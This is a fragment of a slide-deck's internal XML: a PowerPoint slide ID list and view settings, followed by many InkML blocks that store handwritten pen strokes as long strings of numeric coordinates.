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37"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="1000" r:id="rId3"/>
    <p:sldId id="1001" r:id="rId4"/>
    <p:sldId id="2137" r:id="rId5"/>
    <p:sldId id="978" r:id="rId6"/>
    <p:sldId id="996" r:id="rId7"/>
    <p:sldId id="997" r:id="rId8"/>
    <p:sldId id="998" r:id="rId9"/>
    <p:sldId id="999" r:id="rId10"/>
    <p:sldId id="2138" r:id="rId11"/>
    <p:sldId id="1321" r:id="rId12"/>
    <p:sldId id="1322" r:id="rId13"/>
    <p:sldId id="1047" r:id="rId14"/>
    <p:sldId id="2139" r:id="rId15"/>
    <p:sldId id="1049" r:id="rId16"/>
    <p:sldId id="1050" r:id="rId17"/>
    <p:sldId id="2140" r:id="rId18"/>
    <p:sldId id="1022" r:id="rId19"/>
    <p:sldId id="1323" r:id="rId20"/>
    <p:sldId id="644" r:id="rId21"/>
    <p:sldId id="2144" r:id="rId22"/>
    <p:sldId id="645" r:id="rId23"/>
    <p:sldId id="1036" r:id="rId24"/>
    <p:sldId id="2133" r:id="rId25"/>
    <p:sldId id="2105" r:id="rId26"/>
    <p:sldId id="2134" r:id="rId27"/>
    <p:sldId id="2123" r:id="rId28"/>
    <p:sldId id="1056" r:id="rId29"/>
    <p:sldId id="2141" r:id="rId30"/>
    <p:sldId id="2142" r:id="rId31"/>
    <p:sldId id="1067" r:id="rId32"/>
    <p:sldId id="1068" r:id="rId33"/>
    <p:sldId id="1054" r:id="rId34"/>
    <p:sldId id="1205" r:id="rId35"/>
    <p:sldId id="214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C3"/>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67"/>
    <p:restoredTop sz="94575"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="67" d="100"/>
          <a:sy n="67" d="100"/>
        </p:scale>
        <p:origin x="200" y="113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16:09:34.34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18 16383,'56'-5'0,"-8"1"0,-32 1 0,7 2 0,-5-3 0,5 4 0,0 0 0,-5 0 0,1 0 0,-3 0 0,-4 0 0,5 0 0,-1 0 0,0 4 0,0-3 0,1 2 0,-1 1 0,8-3 0,-6 2 0,5-3 0,-10 0 0,6 0 0,-5 0 0,2 0 0,3 0 0,-6 0 0,7 4 0,-3-3 0,-1 2 0,14-3 0,-10 4 0,10-3 0,-13 3 0,3-4 0,-3 0 0,3-4 0,-4 3 0,-3-3 0,6 4 0,-2-3 0,4 2 0,-1-3 0,-8 4 0,4 0 0,0 0 0,-3 0 0,6 0 0,-6 0 0,3 0 0,0 0 0,7 0 0,-5 0 0,5-4 0,-6 3 0,6-2 0,-9 3 0,23-4 0,-21 3 0,15-2 0,-19 3 0,7 3 0,-5 2 0,6 3 0,-7-4 0,2 3 0,1-2 0,1-1 0,0 0 0,5 0 0,-7-3 0,8 2 0,-6-3 0,3 0 0,-3 0 0,-1 0 0,0 0 0,-4 0 0,5 4 0,-1-3 0,4 2 0,-3-3 0,3 0 0,-8 0 0,7 0 0,-5 0 0,2 0 0,7 0 0,-9 0 0,10 0 0,-11 0 0,9 0 0,-7 0 0,16 0 0,-13 0 0,6 0 0,-8-3 0,-3 2 0,6-3 0,-6 0 0,3 3 0,3-2 0,-5 3 0,2 0 0,7 0 0,-12 0 0,11 0 0,-9 0 0,3 0 0,0 0 0,1 0 0,3 3 0,-3-2 0,3 3 0,-4-4 0,0 0 0,1 3 0,6-2 0,6 3 0,-7-4 0,7 0 0,-15 0 0,2 0 0,3 4 0,-5-4 0,2 4 0,21-4 0,-23 0 0,23 0 0,-25 0 0,8 0 0,-6 0 0,9 0 0,-10 0 0,3 0 0,7 0 0,-5 0 0,7 0 0,1 0 0,-1 0 0,13 0 0,-11 0 0,23 0 0,-28 4 0,21-3 0,-25 2 0,9-3 0,-14 0 0,10 0 0,-10 0 0,7 0 0,-3 0 0,6 0 0,-5 0 0,20 0 0,-18 0 0,30 0 0,-28 0 0,21 0 0,-18 0 0,10 0 0,-13 0 0,1 0 0,-15 0 0,7 4 0,6-3 0,1 6 0,1-6 0,0 2 0,-5-3 0,5 4 0,-7-3 0,11 3 0,-12-4 0,18 3 0,-12 3 0,1-2 0,6 1 0,8-1 0,-8-4 0,10 4 0,-22-4 0,7 0 0,-4 0 0,14 0 0,-7 0 0,23 5 0,-15 0 0,11 1 0,-14-1 0,5-5 0,-11 0 0,10 0 0,-21 0 0,5 0 0,0-8 0,-8 7 0,12-7 0,-11 8 0,5-3 0,3 2 0,4-8 0,-3 8 0,9-3 0,-12 0 0,5 3 0,-7-3 0,-3 4 0,6-3 0,-6 2 0,3-3 0,3 0 0,-9 3 0,9-2 0,1 3 0,5 0 0,0-4 0,-2 3 0,1-2 0,-6 3 0,5 0 0,-6 0 0,-1 0 0,0 3 0,12 2 0,-9-1 0,14 0 0,-18-4 0,14 0 0,-14 0 0,5 0 0,-5 0 0,22 0 0,-14 0 0,25 0 0,-34 0 0,40 0 0,-26 0 0,43 0 0,-37 0 0,11 0 0,-2 0 0,19 4 0,-18-2 0,39 7 0,-40-8 0,38 3 0,-39-4 0,2 0 0,-28-3 0,32-2 0,-17 1 0,18 0 0,-20 4 0,36 0 0,-24 0 0,30 0 0,-40 0 0,14-7 0,-10 0 0,4-1 0,-16 3 0,8 5 0,-11 0 0,7-4 0,-11 3 0,7-6 0,-4 6 0,8-3 0,-10 4 0,14 0 0,-15 0 0,10 0 0,-10 0 0,8 0 0,-5 0 0,14 0 0,-19-3 0,30 2 0,-15-3 0,10 4 0,-10 0 0,31 0 0,-20 5 0,26-4 0,-35 4 0,4-9 0,-9 3 0,-2-3 0,-13 4 0,8 0 0,-8 0 0,12 0 0,-7 0 0,-2 0 0,5 0 0,-3 0 0,-2 0 0,5 0 0,-7 0 0,4 0 0,1-3 0,-1 2 0,4-3 0,-7 4 0,6 0 0,-6 0 0,3 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,4 0 0,-6-4 0,5 4 0,-3-4 0,-2 4 0,5 0 0,-7 3 0,4-2 0,1 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8:53:11.796"/>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1 16383,'75'0'0,"1"0"0,1 0 0,-5 0 0,17 0 0,13 0 0,15 0 0,-11 0 0,11 0 0,-14 0 0,14 0 0,4 0 0,-2 8 0,12-5 0,-49 7 0,1 0 0,-10-7 0,-1-2 0,6 5 0,-5-1 0,40-5 0,-39 0 0,-5 6 0,-1-4 0,-27 3 0,2-1 0,-6-4 0,-10 5 0,19-10 0,-9 5 0,9-5 0,-8 5 0,14 0 0,-9 5 0,23 5 0,-24-3 0,24 9 0,-11-6 0,1-1 0,11 0 0,-26-3 0,25-5 0,-24 9 0,24-9 0,-25 11 0,25-11 0,-10 13 0,-1-13 0,12 15 0,3-5 0,3-1 0,26 8 0,-39-16 0,35 8 0,-36-10 0,11 0 0,-26 0 0,-9 0 0,-4-5 0,7 4 0,2-7 0,-1 6 0,-1-2 0,0 4 0,-1 0 0,29 0 0,-7 0 0,26 0 0,-15 0 0,0 0 0,-15 0 0,-3 0 0,-14 0 0,0 0 0,-1 0 0,1 0 0,-3 0 0,3-4 0,-2 2 0,2-2 0,1 4 0,-4 0 0,2-4 0,-2-2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11:53.153"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.21167" units="cm"/>
      <inkml:brushProperty name="height" value="0.21167" units="cm"/>
      <inkml:brushProperty name="inkEffects" value="pencil"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">43 58 16383,'4'14'0,"-4"-1"0,-4-3 0,-3 1 0,3 3 0,1 0 0,-1 0 0,0 6 0,0 1 0,0 0 0,-2 14 0,5-17 0,-5 18 0,6-15 0,0 16 0,0-8 0,0 18 0,0-7 0,0 9 0,4-9 0,-3 7 0,3-23 0,3 24 0,-2-30 0,10 32 0,-6-26 0,4 14 0,-8-11 0,6 6 0,-6 11 0,7-7 0,-8 1 0,3-19 0,-7-5 0,7 3 0,-4-5 0,4 4 0,0-8 0,0 5 0,5 4 0,4 14 0,-2-7 0,6 11 0,30 36 0,-22-32 0,6 6 0,-1-3 0,-11-15 0,13 11 0,-20-23 0,1 1 0,-6-9 0,7 1 0,-2 2 0,11 4 0,5 0 0,-8-2 0,33 14 0,-9-6 0,16 14 0,7-5 0,3 6 0,2-4 0,-13-2 0,-4-15 0,-8-4 0,-8-4 0,-1 4 0,-16-1 0,17 1 0,-10 0 0,6 0 0,-3 0 0,-4 0 0,29 10 0,-8-6 0,8 6 0,-21-9 0,19 2 0,-6 6 0,8-6 0,5 0 0,20 10 0,-26-9 0,-3-4 0,-7-2 0,-1 3 0,-19-9 0,18 9 0,-18-10 0,2 8 0,-5-9 0,-5 4 0,5-1 0,1 2 0,0 4 0,20-4 0,5 6 0,0-10 0,26 6 0,-13-7 0,31 0 0,0 0 0,-11 0 0,-12 0 0,-3 0 0,-17 0 0,7 0 0,0 0 0,-18 0 0,15 0 0,-7 0 0,-8 0 0,-1 0 0,-15 0 0,13 0 0,-8 0 0,24 0 0,-16 0 0,11 0 0,10 0 0,-8 0 0,19 0 0,-19 0 0,8 0 0,-10 0 0,10 0 0,2 0 0,-10 0 0,16 0 0,-26 0 0,8 0 0,-3 0 0,3 0 0,-14 0 0,10 0 0,-15 0 0,9 0 0,9-6 0,11-2 0,-18 1 0,16 0 0,-19 2 0,21 3 0,-7-9 0,7 10 0,-11-10 0,1 9 0,0-3 0,-1 5 0,-9-4 0,-3 3 0,0-3 0,2 4 0,11-6 0,0 5 0,-1-5 0,-9 2 0,7-8 0,-18 1 0,8-5 0,-16 8 0,4-5 0,-12 2 0,2-2 0,-4 3 0,5-2 0,-1 4 0,2-4 0,-4 2 0,-2 2 0,3-2 0,-3 0 0,2 2 0,-5-2 0,2 0 0,-3 2 0,0-2 0,0-1 0,-1 0 0,1 0 0,0-2 0,17-18 0,-13 12 0,13-20 0,-16 18 0,-3 0 0,2-5 0,-6 5 0,7-6 0,-4 6 0,1-4 0,2 4 0,-6 0 0,3 1 0,-4 0 0,0 8 0,0-7 0,0 11 0,0-5 0,3 2 0,-2-9 0,2 4 0,-3 0 0,0-24 0,0 23 0,0-39 0,0 38 0,0-18 0,0 15 0,0 0 0,0 4 0,0-2 0,0 7 0,0-8 0,0 0 0,-3 5 0,2-5 0,-5 6 0,2 0 0,-3 3 0,0-2 0,0 2 0,-5-9 0,0 4 0,-5-9 0,2 10 0,0-5 0,0 6 0,1 0 0,-10-11 0,10 12 0,-15-13 0,20 18 0,-16-9 0,7 8 0,-3-3 0,-4-1 0,4 4 0,2-3 0,-36-14 0,35 14 0,-56-23 0,39 18 0,-7-2 0,8 7 0,15 5 0,3 3 0,-1-4 0,8 4 0,0-2 0,-14-2 0,11 0 0,-12-3 0,12 7 0,-26-6 0,19 5 0,-25-2 0,15-2 0,1 4 0,-17-7 0,18 7 0,-3-4 0,-14 2 0,10-4 0,-24-2 0,20 2 0,3 4 0,16 0 0,1 6 0,1-2 0,6 3 0,-11-4 0,-5 3 0,-10-8 0,-11 2 0,-10-7 0,-13 7 0,-3-6 0,4 11 0,12-4 0,10 0 0,-10-1 0,7-1 0,-7-4 0,20 11 0,3-5 0,11 6 0,-1 0 0,6 0 0,1 0 0,0 0 0,-1 0 0,-6 0 0,1 0 0,4 0 0,-15 0 0,13 0 0,-25 0 0,25-3 0,-56-2 0,54 1 0,-44 0 0,18 4 0,18 0 0,-24 0 0,32 0 0,-11 0 0,7-4 0,-58-5 0,36 3 0,-29-2 0,42 8 0,2 0 0,-2 0 0,-1 0 0,-7 0 0,17 0 0,-7 0 0,11 0 0,-1 0 0,-10 0 0,7 0 0,-7 0 0,11 0 0,-1-4 0,0 3 0,6-3 0,1 4 0,0 0 0,-1 0 0,-5-4 0,-1 3 0,0-3 0,-10 4 0,16 0 0,-24 0 0,25 0 0,-17-4 0,10 3 0,6-3 0,-5 4 0,11 0 0,-5 0 0,0-4 0,-1 3 0,-6-3 0,1 4 0,-18-5 0,13 0 0,-22-2 0,13-3 0,-20 9 0,8-10 0,-19 3 0,29 1 0,-5 0 0,10 7 0,-3-5 0,-9 3 0,9-3 0,-28 5 0,39 0 0,-27 0 0,15-7 0,9 6 0,-16-6 0,11 7 0,8 0 0,-28-6 0,14-2 0,-6 1 0,-19-6 0,39 11 0,-18-5 0,28 7 0,6-3 0,-6 2 0,8-2 0,0 3 0,1 0 0,-1-3 0,-8 2 0,-3-6 0,1 6 0,-4-3 0,4 4 0,-6 0 0,0 0 0,0-4 0,1 3 0,-1-3 0,6 1 0,1 2 0,9-2 0,1 3 0,3 0 0,0 0 0,0 0 0,-4 0 0,4 0 0,-7 3 0,3-2 0,-3 2 0,0 0 0,0-2 0,6 5 0,-4-5 0,7 5 0,-8-5 0,5 5 0,-2-2 0,3-1 0,0 4 0,-1-4 0,1 4 0,0-3 0,0 2 0,0-5 0,0 5 0,0-5 0,3 5 0,-2-2 0,2 3 0,-3 0 0,0-3 0,3 2 0,-2-2 0,2 3 0,0 0 0,-2-3 0,5 2 0,-5-6 0,2 7 0,0-7 0,1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1:00:10.009"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 1 24575,'4'4'0,"-3"4"0,6-7 0,-6 6 0,6-3 0,-6 4 0,6-3 0,-6 2 0,6-6 0,-2 3 0,-1-1 0,4 2 0,-4-1 0,1 3 0,2-6 0,-3 6 0,5-6 0,-1 7 0,0-8 0,0 4 0,0 0 0,0-3 0,0 6 0,0-3 0,0 4 0,4-3 0,-3 2 0,3-2 0,0 3 0,-3 3 0,6-2 0,-6 3 0,3 0 0,-4-7 0,0 10 0,0-10 0,0 7 0,0-4 0,1 0 0,-1 0 0,0-3 0,-4 2 0,3-2 0,-2 3 0,7 7 0,-3-5 0,-1 5 0,-1-7 0,-2 1 0,3-1 0,7 18 0,-5-13 0,5 16 0,-7-16 0,0 0 0,-3-1 0,2 3 0,-2-9 0,-1 9 0,3-7 0,-6 1 0,3 3 0,-1 14 0,-2-10 0,6 22 0,-6-20 0,3 6 0,-4-11 0,4 9 0,0-7 0,1 8 0,-2-10 0,-3-1 0,0-4 0,0 4 0,0-3 0,4 6 0,-3-6 0,2 3 0,-3-4 0,0 3 0,0-2 0,0 7 0,0-7 0,0 2 0,0-2 0,0 6 0,0-5 0,0 12 0,0-8 0,0 6 0,0-7 0,0 13 0,0-14 0,0 18 0,0-20 0,-3 9 0,2-10 0,-7 13 0,7-7 0,-6 5 0,6-9 0,-2-2 0,-1-1 0,3 0 0,-3 0 0,4 4 0,0 0 0,-3-3 0,2 2 0,-7 1 0,4-2 0,-1 9 0,-2-6 0,6-1 0,-6 4 0,2 0 0,-3-6 0,3 8 0,-2-13 0,2 11 0,-3-7 0,-4 13 0,3-11 0,-3 8 0,8-11 0,-4 0 0,7 0 0,-6 1 0,6-1 0,-3 0 0,1 0 0,-2 0 0,1 0 0,-4 0 0,7 0 0,-2 0 0,-1-3 0,3 2 0,-6-2 0,6 3 0,-6 0 0,6 0 0,-14 7 0,9-5 0,-10 5 0,11-6 0,-2-5 0,6 7 0,-10 2 0,9 0 0,-9 6 0,10-10 0,-6 3 0,6-4 0,-6 4 0,6-3 0,-6 2 0,6-3 0,-7-3 0,7 2 0,-6 1 0,2 1 0,1 3 0,-3-4 0,6 0 0,-7-3 0,4 6 0,-1-6 0,-2 3 0,6-1 0,-6-2 0,6 3 0,-7-4 0,7 4 0,-6-4 0,3 4 0,-5-3 0,1 2 0,0-6 0,0 2 0,-1 1 0,1-3 0,3 6 0,5-6 0,1-12 0,3 0 0,1-19 0,-4 11 0,3-10 0,0 11 0,-3-5 0,6 10 0,-6-3 0,6 7 0,-6-3 0,3 4 0,-4 0 0,0-1 0,0 1 0,0 0 0,3 0 0,-2-1 0,3 1 0,-4 0 0,0 0 0,0-1 0,0 1 0,3 4 0,-2-4 0,3 4 0,-4-5 0,0 1 0,0 4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1:00:11.800"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 0 24575,'8'0'0,"0"0"0,4 4 0,1 0 0,3 1 0,0-2 0,-3-3 0,-1 0 0,-8 4 0,4-3 0,-4 2 0,4-3 0,0 0 0,11 5 0,-5-4 0,5 7 0,-7-7 0,-4 3 0,0-4 0,-3 3 0,2-2 0,-6 6 0,6-6 0,-3 3 0,5-4 0,-5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1:00:15.336"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">3699 1 14892,'-8'0'0,"-1"0"4073,1 0-4073,0 0 1674,0 0-1674,-4 0 907,-1 3-907,-4-2 3029,5 7-3029,-11-8 0,2 9 0,-10-8 0,0 8 0,-12-1 0,-4-2 0,-25 5 0,22-10 0,-7 8 0,32-8 0,-44 4 0,22-5 0,-41 5 0,52-1 0,-31 2 0,28 4 0,-10-5 0,-3 0 0,-15 10 0,-22-5 0,19 4-722,-28-4 722,7 15 0,12-12 0,28-2 0,1 2 0,-25 2 0,24-10 0,1 2 0,-22 10 0,29-16 0,18 8 0,-5-9 0,12 8 0,-1-7 0,7 2 0,4-3 722,-1 0-722,1 4 0,0-3 0,0 2 0,-1 1 0,-3-3 0,-14 11 0,6-10 0,-11 9 0,8-10 0,5 3 0,-12 1 0,12-4 0,-1 3 0,0 0 0,5-3 0,-6 2 0,3 1 0,-20-3 0,15 6 0,-30-2 0,26-1 0,-6 3 0,2-1 0,12 2 0,-19 2 0,17-1 0,-17 1 0,19-6 0,-12 6 0,-7-3 0,-37 9 0,9-1 0,15-7 0,0-1 0,-12 7 0,2-3 0,17-3 0,22 0 0,-8-7 0,14 6 0,-8-2 0,7 3 0,-1-4 0,1 3 0,-1 2 0,1 0 0,-7 3 0,-2 2 0,-6-2 0,0 3 0,6-6 0,2-3 0,10-3 0,1-3 0,7 4 0,-2-3 0,2 2 0,-3-3 0,0 4 0,0-3 0,0 2 0,-1-3 0,1 0 0,0 0 0,3 4 0,-2-3 0,2 3 0,-3-4 0,-4 0 0,3 3 0,-3-2 0,4 3 0,0-4 0,-1 3 0,1-2 0,0 3 0,0-4 0,-1 0 0,1 0 0,-4 0 0,-1 0 0,-3 0 0,3 0 0,-3 3 0,7-2 0,-3 3 0,8 0 0,0-7 0,8 2 0,-3-7 0,6-1 0,-3-3 0,1 3 0,2-3 0,-2 4 0,-1 0 0,3 3 0,-2-2 0,-1 2 0,3 1 0,-6-4 0,7 4 0,-7-4 0,6 3 0,-6-2 0,6 2 0,-3-3 0,1 0 0,2-1 0,-6 1 0,6 0 0,-2 0 0,3-1 0,0 1 0,-4 0 0,4 3 0,-8-2 0,8 6 0,-4-6 0,1 6 0,-2-3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3T01:00:16.901"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 0 24575,'3'5'0,"-2"2"0,6-3 0,-2 1 0,3 2 0,4-2 0,1 3 0,-1 0 0,0 0 0,-4 0 0,0-3 0,0-2 0,-3 1 0,2-3 0,-6 6 0,10-3 0,-6 5 0,11-1 0,-7 0 0,6 0 0,-6-4 0,3 0 0,-4 0 0,0-4 0,-4 8 0,4-7 0,-4 6 0,1-3 0,2 1 0,-3 2 0,4-3 0,1 5 0,-1-1 0,-4 0 0,3-4 0,-6 4 0,7-8 0,-8 4 0,4-4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16:33:36.901"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 0 24575,'8'0'0,"-3"4"0,2-3 0,-6 6 0,6-6 0,-2 3 0,3-1 0,0 2 0,4 3 0,-3 0 0,6 0 0,-6 0 0,3-3 0,0 5 0,-3-4 0,6 6 0,-6-4 0,3-4 0,-4 3 0,0-2 0,0-1 0,0 4 0,4 0 0,1 1 0,10 8 0,-9-11 0,8 7 0,-9-8 0,-1 3 0,4-4 0,-7 3 0,3-6 0,-4 3 0,4-1 0,-3 2 0,6-1 0,-6 4 0,3-7 0,0 6 0,-3-3 0,2 1 0,-3-2 0,1 1 0,-1-3 0,0 6 0,0-6 0,0 6 0,4-2 0,0 6 0,11-1 0,-5-1 0,12 0 0,-12-4 0,1 0 0,-3-1 0,-7-4 0,2 0 0,1 0 0,-3 0 0,3 4 0,-4 0 0,0 1 0,0 2 0,0-6 0,0 2 0,1 1 0,-1 0 0,3 1 0,-2 2 0,3-6 0,-4 3 0,0-1 0,1-2 0,2 3 0,2-4 0,3 3 0,7-2 0,2 7 0,-1-6 0,-1 6 0,-6-7 0,-5 2 0,0-3 0,-4 0 0,0 4 0,1-3 0,-1 6 0,0-6 0,0 6 0,0-2 0,0-1 0,0 3 0,0-6 0,0 6 0,4-2 0,1-1 0,3 4 0,-3-8 0,-1 8 0,-4-7 0,0 2 0,0 1 0,0-3 0,0 2 0,0 1 0,0-3 0,0 2 0,1-3 0,-5-3 0,0 2 0,-4-3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16:33:38.233"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 0 24575,'0'3'0,"0"3"0,0 6 0,0 4 0,0-4 0,4 5 0,-3-1 0,3 0 0,-4 7 0,0-8 0,0 7 0,3-10 0,-2 5 0,6 3 0,-6 4 0,6-3 0,-6 2 0,3-10 0,-4-1 0,3-4 0,-2 0 0,7-4 0,-4-4 0,1-4 0,-2-1 0,-3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2T16:33:39.283"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 59 24575,'53'0'0,"-1"0"0,-34 0 0,1 0 0,-4 0 0,-2-4 0,0 3 0,-1-3 0,-4 1 0,0-2 0,0 1 0,4 0 0,0 4 0,5 0 0,-5 0 0,4-4 0,-7 3 0,3-2 0,-4 3 0,0-4 0,0-1 0,0-3 0,0 4 0,-3 0 0,-2 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32:18.551"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 2727 24575,'89'-33'0,"-1"-1"0,1 0 0,-1 0 0,1 0 0,0 1 0,-1-1 0,1 0 0,0 0 0,-1 0 0,1 1 0,2 0 0,3 0 0,2-1 0,0 0 0,1 1 0,-2 1 0,-2 2 0,-3 1 0,-5 4 0,-6 3 0,-5 4-2458,32-3 0,-13 9 1,-3 3-1,6-1 2209,-11-1 1,5-1 0,2 1 0,-1 0-1,-3 0 1,-7 1 248,2 0 0,-6 1 0,-2 0 0,4-3 153,0 0 1,4-3-1,1-1 1,-1 1 0,-4 0-154,0 2 0,-4 2 0,1-3 0,8-4-282,-7-2 1,7-4-1,5-4 1,1 0-1,-1-1 1,-4 3-1,-7 2 282,14-2 0,-8 4 0,-1-1 0,6-3 0,-9-1 0,6-3 0,2-3 0,-1 2 0,-5 2 0,-9 4-432,8 2 1,-9 4 0,0-2 431,2-5 0,-1-1 0,2 1 0,3 2 0,2 1 0,3-4 0,-5-1 0,3-5 0,0 0 0,-5 2 0,4 0 0,-5 2 0,2-3 0,-6 0 0,3-3 0,-2 0 0,-6 6 0,16-1 0,-5 2 0,9-6 0,-3 3 1085,-21 14 1,-2 2-1086,1-4 0,-6 0 1073,-5 4-1073,21-10 0,-51 16 0,12 3 4907,-5-3-4907,20 0 2877,17 3-2877,2-2 0,-16 4 0,3-1 540,1 0 1,2-2-541,12-2 0,2-3 0,-7-2 0,0-1 0,11 5 0,-2-3 0,-15-9 0,-2-2 0,8 4 0,-3-2 0,-15-4 0,-4-2 0,34-17 497,-14-4-497,-9 23 0,-8-4 0,-23 20 0,-16 5 0,-10 5 1212,-1 5-1212,-6 0 0,7-1 0,-4-4 0,0 0 0,-4 0 0,-8 0 0,-6 0 0,0 0 0,-32 0 0,0-8 0,2 2 0,-6 0-839,2 1 0,-4-1 839,-17-4 0,-1 0 0,9 9 0,5 0 0,16-5 0,4 1 0,-36 5 0,55 0 0,-6 0 0,15 0 0,16 4 0,-3-3 1678,3 3-1678,-8-4 0,3 4 0,-7 1 0,7 4 0,1 0 0,9-4 0,16-1 0,20 3 0,-13-5 0,5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8:39:28.614"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 1 24575,'20'0'0,"1"8"0,26 7 0,5 9 0,-6-5 0,1 0 0,31 13-562,-21-8 0,0 1 562,21 12 0,-26-16 0,0 0 0,23 15 0,19-4 0,-19 4 0,8-5 0,-10 11 0,12 6 0,-35-18 0,14 18 275,-42-33-275,6 16 0,-7-9 0,1 1 0,6 7 0,4-1 849,5 8-849,-10-13 0,3 1 0,-4-3 0,2-2 0,-2 5 0,-7-9 0,-5-6 0,-3 4 0,2-4 0,-5 4 0,2-3 0,2 8 0,-4-7 0,9 14 0,-9-11 0,8 10 0,-3-4 0,1 6 0,1-6 0,-6-1 0,1-6 0,-3-4 0,0 0 0,0-3 0,0 0 0,-4 0 0,4 3 0,-4-2 0,9 11 0,-3-1 0,11 19 0,-10-14 0,5 4 0,-8-17 0,-3-3 0,2 3 0,3 7 0,-1-2 0,3 5 0,-7-10 0,2-3 0,-2-3 0,0 2 0,3 7 0,-3-1 0,4 7 0,-4-11 0,2-1 0,-2-4 0,0 0 0,2 4 0,-5 1 0,5 2 0,-5-3 0,5 0 0,-2-3 0,-1-4 0,-3-13 0,-1 7 0,-3-6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32:20.380"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">204 0 24575,'14'4'0,"-2"-3"0,-7 7 0,-1-3 0,-4 8 0,0 1 0,-5 11 0,4-5 0,-9 12 0,8-16 0,-7 8 0,4-11 0,-4 5 0,4-4 0,-3 3 0,3-7 0,0 3 0,1 0 0,0 0 0,3 1 0,-3-1 0,4-4 0,-4 0 0,3 0 0,-3 0 0,0-1 0,3 5 0,-7 1 0,3 4 0,-4 0 0,0-4 0,4 3 0,-3-8 0,7 4 0,-7-8 0,7 3 0,-7-3 0,7 4 0,-7 0 0,7 0 0,-7-1 0,7 1 0,-7 0 0,7 0 0,-7-4 0,7 3 0,-7-7 0,3 7 0,-4-3 0,0-1 0,4 4 0,-3-7 0,7-1 0,-3-9 0,4 3 0,0-2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32:23.811"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">8572 10 24575,'-18'-5'0,"0"1"0,0 4 0,-8 0 0,7 0 0,-14 0 0,13 0 0,-12 0 0,-8 7 0,-11-5 0,1 10 0,2-11 0,1 11 0,-3-10 0,-14 12 0,0-12 0,1 5 0,-14 1 0,23-1 0,-33 11 0,54-11 0,-39 8 0,16 3 0,-24 2 0,20-2 0,-38-1 0,48-7 0,-18 0 0,-6 1 0,-16-2 0,30 0 0,0-1 0,-16 1 0,12 7 0,0 0 0,14-2 0,3-1 0,20-3 0,1 4 0,1 2 0,-2 0 0,-7 5 0,7-9 0,-19 13 0,3-11 0,-7 7 0,-11-5 0,24-4 0,-11 1 0,-12 1 0,19-2 0,-32 5 0,9-2 0,-3 1 0,-23 2-589,10 0 589,-13 0 0,13-1 0,-10-7 0,-3 6 0,-3-13 0,3 13 0,41-7 0,1 2 0,-32 8 0,30-1 0,0 1 0,-27 8 0,-10 1 0,23-5 0,-10-6 0,13 6 0,15-9 0,-5 2 0,-15 14 0,-1 1 0,11-13 0,-2 0-761,-17 17 1,1 1 760,22-14 0,0-1 0,-26 6 0,-3 1 0,11 0 0,0-4 0,-9-9 0,2-4 0,24-1 0,3-2 0,-8-7 0,2-2 0,-37 1 0,38 4 0,-3 1 0,-7-5 0,0 2 0,10 6 0,0 1 0,-16-3 0,2 0-416,-24 12 416,3 0 0,3 9 0,10 0-426,27-8 1,0 1 425,4 3 0,1 0 0,-45 8 0,34 7 0,-1 1 0,9-15 0,2-1 0,-4 16 0,0 1 0,1-10 0,3-3 0,-11 14 506,-4-2-506,4-9 0,9-2 0,-25-2 0,-4 4 0,0 0 337,1-7-337,-11 8 0,3 1 0,24-7 0,11-10 0,-2 0 0,-40 12 0,14-9 